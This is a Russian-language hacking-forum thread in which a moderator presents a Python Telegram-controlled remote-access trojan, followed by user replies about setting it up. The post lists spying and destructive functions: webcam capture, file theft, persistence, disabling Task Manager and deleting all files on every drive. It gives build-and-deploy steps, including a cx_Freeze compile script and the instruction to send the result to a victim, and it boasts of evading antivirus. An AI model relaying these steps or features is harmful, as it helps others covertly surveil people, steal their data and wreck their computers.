Интересно TeleSpy Telegram RAT by CMDfromBAT на языке Python

CMDfromBAT

"Рыбак" со стажем
Moderator
Сообщения
195
Оценка реакций
216
1588419046632.png
Привет форумчанин!
Сегодня я бы хотел представить вам свою версию телеграм-рата. Однако по поводу самого рата я вам скажу чуток позже.

Прежде пару слов

В процессе написания РАТника я искал информацию о них, искал полезные функции для включения в него и т.д.
Я наткнулся вот на эту статью на питон-форуме:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

Почитайте, полезно. И я обнаружил такую особенность всех питон форумов - вы не замечали, что все эти разрабы прям очень против ИБ? Попроси помощи у кого либо, и если у них есть подозрения о том что это "зловред", то сразу начинается срач? Вы блядь кодеры, вас не должно ебать кто что пишет, вы тут для помощи. Не хотите помогать, так заткнитесь в тряпочку.
Цитирую форум:
Как и большинство «темных» разработчиков, которые создают RAT с двойным назначением, разработчик назвал свое творение Remote Administration Tool (Инструмент удаленного администрирования). Даже если часть функций, над которыми он в данный момент работает, обычно обнаруживается во вредоносных троянах. Они не являются легальными инструментами удаленного администрирования, такими как Teamviewer и другие.

Разработчик также не забыл исполнить старый номер, и обязательный «отказ от ответственности» в конце описания RATAttack, надеясь избежать последствий, к которым приведут злоумышленники, используя его код, который находится в свободном доступе для слежки за супругами, взлома компаний, или держать диссидентов под наблюдением. Предположительно, этот инструмент должен использоваться только в авторизированных системах. Любое неавторизированное использование данного инструмента без разрешения является нелегальным. Вопрос ПО с двойным назначением, используемым для легальных и преступных целей, недавно обсуждался в новостях.
Лично я в этом вижу ужасную нелогичность, ибо *строю из себя умного* согласно стандартам PSI DSS для обеспечения ИБ требуется регулярно проводить аудит информационных систем. А это возможно только с помощью тех утиллит, которые используются для атак.

Нельзя защитить замок от взлома, не зная как его вскрывают отмычками.

Где defintion "легальный инструмент удаленного администрирования"?
ВСМЫСЛЕ БЛЯДЬ НАДЕЯСЬ ИЗБЕЖАТЬ ПОСЛЕДСТВИЙ К КОТОРЫМ ПРИВЕДУТ ЗЛОУМЫШЛЕННИКИ!?
Злоумышленники используют командную строку. Злоумышленники пишут на питоне. Злоумышленники пользуют гугл. По вашей логике их всех надо запретить. А отказ от ответственности дело двуликое - код опернсорсный и чисто юридически не несет опасности, т.к. в нем нету того самого токена для бота. И любое изменение кода (путем вставки токенов) является изменением его и разраб уже освободился от ответственности.
Все, крик души вышел из чата. Приступим к РАТнику

В связи с проблемой при открытии портов на роутере я заинтересовался альтернативами njrat'a. Вспомнив что я пишу на питоне я нашел тему от #~Shinigami~# и нашел сорцы кода. К сожалению у меня было кучу багов и я поискал другие сорцы. Там тоже самое. Плюс к тому я хотел модифицировать РАТники под себя, и принялся за разработку.

Скажу сразу - я не гнался за оригинальностью кода. Я брал даже целые куски с других РАТников и строил их под себя. Я не вижу в этом проблемы - код опенсорс. Да и я вам больше скажу - мы все юзаем Stackoverflow, даже ТЫ.

Вот возможности РАТа:

Основные команды:
/Screen - Скриншот экрана
/Webcam - загрузить фото с веб-камеры
/Info - Инфо о юзере
/cd - выбор директории
/ls - Просмотр файлов текущей директории
/Download - скачать файл директории
/Run - запустить файл
/Del - удалить файл
/Del_dir - удалить папку
/WiFi - Отключить WiFi
/Link - Открыть ссылку
(пример:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

)
/Autorun - добавить файл в автозагрузку
/Error - вывести жертве сообщение Error
/cmd - выполнить код командной строки
/Disabletskmgr - убить диспетчер задач
/Antivirus - проверить наличие Антивирусного ПО
/Explorer - открыть файловый менеджер


Команды для развлечения:
/Achtung - вывести жертве сообщение АХТУНГ! ТОБИ ПИЗДА
/custombox - отправить жертве кастомизированное сообщение
/Screamer - открыть в браузере скример-фото
/SwapMouse - поменять местами клавиши мыши
/WannaCry - жертве откроется этот сайт:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


/FBI - фейковое предупреждение от ФБР

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


/Moans - женские стоны
/Moanss - женские стоны но громче
/Pig - визг свиньи

Вирусы:
/killcursor - Удалить курсор
/blackscreen - Черный экран и неуправляемый Windows
/Stoppanel - запрещаем заходить в панель управления
/Killpanel - отключить панель управления
/Delall - удалить все файлы на всех дисках
/Mute - отключить все звуки в системе
/Stoprun - убрать возможность запуска программ
/Killexplorer - убить файловый менеджер

Команды отключения:
/Reboot - перезагрузка устройства жертвы
/Off - выключить устройство жертвы
/Exit - выключить вирус удаленного доступа
/Uninstall - Удалить вирус с устройства жертвы

Так же в сорце закомментирована функция копирования вируса в другую папку, при желании подстройте под себя.

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Для того что бы запустить РАТ, нужно:
Для начала нам нужно создать бота в телеграм. Процитирую Шинигами:
Это не сложно сделать, для этого нужен только

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Дальше нам нужно создать нового бота, для это пишем: /newbot
И дальше нам нужно создать ему имя.
После чего нам покажет его токен, копируем, и заходим на другого бота

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Теперь переходим в соурс нашего рата, и там вводим наш API TOKEN, и Чат - ID
Теперь нужно скомпилировать вирус в exe с помощью любого вам известного компилятора. Я использовал cx_Freeze. В папке нашего сорца создаем файл под названием setup.py куда пишем вот эти строки:
Python:
from cx_Freeze import setup, Executable
executables = [Executable('имя вашего файла', base = "Win32GUI" )]
setup(name = 'Имя программы',
      version = 'Версия',
      description = 'Описания',
      executables= executables
    )
После сохраняем и пишем в командную строку заранее зайдя в директорию где сорцы:
python setup.py build

Кстати можно сделать инсталлер, но это загуглите сами.

Настройка завершена, теперь мы можем перейти к боту и сразу прописать старт. После чего отправляем вирус жертве.
Как только она подключиться, бот пришлет вот такое сообщение:
Жертва на связи!
Время подключения:
*тут понятно*
Юзер: *имя юзера в системе*
IP: *внешний айпи жертвы*
OС: *система*

Чтобы узнать команды, введи:
/commands
Тоесть процесс автоматизирован. Теперь можно пользовать вирус.

Пару слов о нем самом. Я хотел подстроить всевозможные функции под себя, тобиш вы получили то что я кодил под себя и свои нужды)
Есть основные команды, есть команды для развлечения. Тут я включил фантазию и понакидал всего что только можно. Камон, кто из нас не любит пошутить над кем то другим. Так же есть скромное меню вирусов и конечно функции выключения и самоуничтожения.
Изначально была идея написать полноценный РАТник, однако я считаю что мой софт это скорее шпион с плюшками ратника (отсюда и название). Он не палится антивирусами, может гулять по директориям, скачивать от туда файлы и т.д. Так же я постарался что бы команды были понятные и бот был "дружелюбным" к пользователю
Функционалом лично я доволен, он как раз таки подходит под поставленные мною цели.

Теперь поставлю вам вопросы:

- Что можно доработать в вирусе в плане функционала?
- Есть ли баги или пожелания?

Пишите в комменты на всеобщее обозрение для дискуссий. Лично я уже знаю что попробую интегрировать кейлогер.

Надеюсь статья была читабельна и мой софт вам зашел
Ваш CMDfromBAT
 
Последнее редактирование:

SuPro

Member
Сообщения
41
Оценка реакций
17
st = 'CMD, '
lst = ['молодец', 'хорошая статья', 'ВЗЛОМ ЖОПЫ Telegram: /Y']
itr = iter(lst)
for cmd in st:
for CMD in lst:
print (st+next(itr), end= ' ||| ')
 
  • Like
Реакции: CMDfromBAT

SuPro

Member
Сообщения
41
Оценка реакций
17
не знаю, в пайтоне я ноль, поэтому разве что спросить - как ты научился в принципе писать вирусы под язык программирования или просто нужно понимание самого синтаксиса и устройства сетей и операциоки? Заранее спасибо

P.S: хотел сделать по красоте, но отступы эти..
 
  • Like
Реакции: CMDfromBAT

CMDfromBAT

"Рыбак" со стажем
Moderator
Сообщения
195
Оценка реакций
216
не знаю, в пайтоне я ноль, поэтому разве что спросить - как ты научился в принципе писать вирусы под язык программирования или просто нужно понимание самого синтаксиса и устройства сетей и операциоки? Заранее спасибо

P.S: хотел сделать по красоте, но отступы эти..
Привет)
Питон сам по себе очень читабельный и с простым синтаксисом. За счет этого можно легко и быстро написать нужный код.
Сам РАТник (или как я его называю шпион) это просто бот. Тобиш я на компе жертвы запускаю бота, а зная простейшие функции (по типу просмотр директории, фото с вебки, открытие ссылки и т.д.) я интегрирую их в код и командой активирую.
Что касается меню "вирусов", так это обычные батники со скриптами, я их создаю и активирую)
 
  • Like
Реакции: SuPro

2we1rd

Member
Сообщения
27
Оценка реакций
15
Идея отличная, снимаю шляпу. Сам сейчас темой телеграм ботов очень увлечен. И собственно поэтому вопрос, лично у меня без впн бота запустить невозможно. Подключение через различные бесплатные прокси тоже не прокатывает. Собственно у меня частично ответ в вопросе. Код не смотрел, но может быть там подключение через рабочий прокси? Иначе как быть, чтобы бот сто процентно запустился на удаленном компьютере? Проблема с блокировками до сих пор актуальна

UPD, смотрю код и вроде как слова не подтвердились. Сам через прокси не работал, но видимо пора учиться. Блин как то не поймите не правильно, но все выглядит подозрительно легко для такой большой уязвимости. В боте уже многое реализовано, но самом деле простор для фантазии остается. Все больше убеждаюсь, что для питона нерешаемых задач не существует. Короче респект автору
 
Последнее редактирование:
  • Like
Реакции: XACKU и CMDfromBAT

SNIPER32

Pro Member
Сообщения
65
Оценка реакций
17
Всё вроде как делаю правильно, но в самом боте как назначить команды ему ?
Или я что-то не доганяю, , реально, команды ему нужно назначать или как ? По сути у меня БОТ вообще ни на что не реагирует, пиши не пиши ему по хер....
 

CMDfromBAT

"Рыбак" со стажем
Moderator
Сообщения
195
Оценка реакций
216
Всё вроде как делаю правильно, но в самом боте как назначить команды ему ?
Или я что-то не доганяю, , реально, команды ему нужно назначать или как ? По сути у меня БОТ вообще ни на что не реагирует, пиши не пиши ему по хер....
Вставь все айди и токены - рат и бот 1-- процентов рабочие, прописываешь старт, ждешь подключения жертвы и после ответа бота о подключении пишешь командс
 

SNIPER32

Pro Member
Сообщения
65
Оценка реакций
17
Вставь все айди и токены - рат и бот 1-- процентов рабочие, прописываешь старт, ждешь подключения жертвы и после ответа бота о подключении пишешь командс
Вот смотри прописал получается в ратник, токен и айди, а в боте куда прописать ? Все пункты выше описаны я сделал, получил токен и айди через ботов, прописал их в рат, скомпилил в ехе, запускаю получается ратник, но там тишина, или что-то не так делаю всё же ?
1588970887911.png
 

CMDfromBAT

"Рыбак" со стажем
Moderator
Сообщения
195
Оценка реакций
216
Вот смотри прописал получается в ратник, токен и айди, а в боте куда прописать ? Все пункты выше описаны я сделал, получил токен и айди через ботов, прописал их в рат, скомпилил в ехе, запускаю получается ратник, но там тишина, или что-то не так делаю всё же ?
Посмотреть вложение 3772
Видимо скомпилио не так, или питон старый

Ратник точно рабочий
 

SNIPER32

Pro Member
Сообщения
65
Оценка реакций
17
Видимо скомпилио не так, или питон старый

Ратник точно рабочий
Скомпилил без ошибок, питон новую версию с офф сайта качнул, может с ботом что не так ? )) Я его до твоей статьи создал ))
 
  • Like
Реакции: CMDfromBAT

al000

New Member
Сообщения
1
Оценка реакций
0
можно ли сделать обход UAC ?было бы чудесно!
 

Tema238509385

New Member
Сообщения
2
Оценка реакций
1
Здравствуй, мне выдает вот такую прекрасную ошибку, возможно я сделал что то не так, вот только что? Если знаешь помоги пожалуйста.
1591461827243.png
 

CMDfromBAT

"Рыбак" со стажем
Moderator
Сообщения
195
Оценка реакций
216